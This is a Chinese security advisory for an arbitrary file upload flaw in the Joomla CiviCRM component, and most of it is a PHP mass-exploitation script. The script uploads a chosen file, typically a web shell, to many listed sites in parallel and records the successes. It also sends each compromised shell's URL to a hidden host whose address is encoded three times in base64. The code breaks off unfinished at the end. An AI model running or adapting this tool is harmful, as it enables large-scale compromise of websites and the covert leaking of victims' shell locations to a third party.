Joomla Civicrm组件任意Shell上传漏洞

发布日期：2013-04-22
更新日期：2013-04-24

受影响系统：
Joomla! Civicrm
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59372
 
Joomla Civicrm是组织成员关系管理系统。
 
Joomla Civicrm组件存在任意文件上传漏洞，攻击者可利用此漏洞上传任意文件到受影响系统，导致任意代码执行。
 
<*来源：miyachung
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<?php
 
set_time_limit(0);
 ob_start();
 class exploit
 {
  private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
  private $post_url_path    = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
  private $filename;
  private $url;
  private $file_to_upload;
  private $if_is_uploaded    = "/Undefined variable: HTTP_RAW_POST_DATA/si";
  private $thread_maxsize;
  private $site_list;
  private $file_regex;
  private $save_file      = "uploaded.txt";
  private $user_agent      = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
  private $timeout_sec    = 20;
  private $token        = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
  private $idnum        = 31;
 
  public function __construct($site_list,$filename,$thread,$regex)
  {
  $this->site_list    = file($site_list);
  $this->filename      = $filename;
  $this->file_to_upload = file_get_contents($filename);
  $this->thread_maxsize = $thread;
  $this->url        = base64_decode(base64_decode(base64_decode($this->token)));
  $this->file_regex    = "/$regex/";
 
  echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
  echo "[+]Coded by Miyachung\n";
  echo "[+]Stay away from lamers o.O\n";
  echo "[+]Contact: miyachung@hotmail.com\n";
  echo "[+]Special Thanks : B127Y\n";
  echo "[+]Site: \n";
  echo "##################################################\n";
  echo "[+]Total urls to try: ".count($this->site_list)."\n";
  echo "[+]File to upload: ".$this->filename."\n";
  echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
  echo "[+]Search Keyword: ".$regex."\n\n";
  ob_flush();
  flush();
  $this->miyachung();
  }
  private function miyachung()
  {
  $multi = curl_multi_init();
  $count = 0;
  foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
  {
    foreach($urls as $i => $url)
    {
    $curl[$i] = curl_init();
    curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
    curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
    curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
    curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
    curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
    curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
    curl_multi_add_handle($multi,$curl[$i]);
    }
    do
    {
    curl_multi_exec($multi,$active);
    }
    while($active > 0);
    foreach($curl as $id => $content)
    {
    $conn[$id] = curl_multi_getcontent($content);
    curl_multi_remove_handle($multi,$content);
    if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
    {
      $count++;
      $check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
      if($check_it && preg_match($this->file_regex,$check_it))
      {
      if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
      {
      $this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
      }
      else
      {
      exit("[-]Somethings has changed in tool! o.O!");
      }
      echo "###########################################################\n";
      echo "[!]Exploitation Successfullll!\n";
      printf("[%s]%s\n",$count,trim($urls[$id]));
      echo "###########################################################\n";
      ob_flush();
      flush();
      $this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
      }
      else
      {
      printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
      ob_flush();
      flush();
      }
    }
    else
    {
      $count++;
      printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
      ob_flush();
      flush();
    }
   
    }
 
  }
 
  }
  private function get($url)
  {
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
  $data= curl_exec($ch);
  curl_close($ch);
  return $data;
  }
  private function post($url)
  {
  $curl = curl_init();
  curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($curl,CURLOPT_URL,$this->url);
  curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
  $exec = curl_exec($curl);
  curl_close($curl);
  return $exec;
  }
  private function save($url,$count)
  {
  $file = fopen($this->save_file,'ab');
  fwrite($file,"#########################################################################\n");
  fwrite($file,"[!]Exploitation Successfullll!\n");
  fwrite($file,"[$count]$url\n");
  fclose($file);
  return true;
  }
 }
 
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
 {
 $exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
 }
 else
 {
 print
 "
 ?>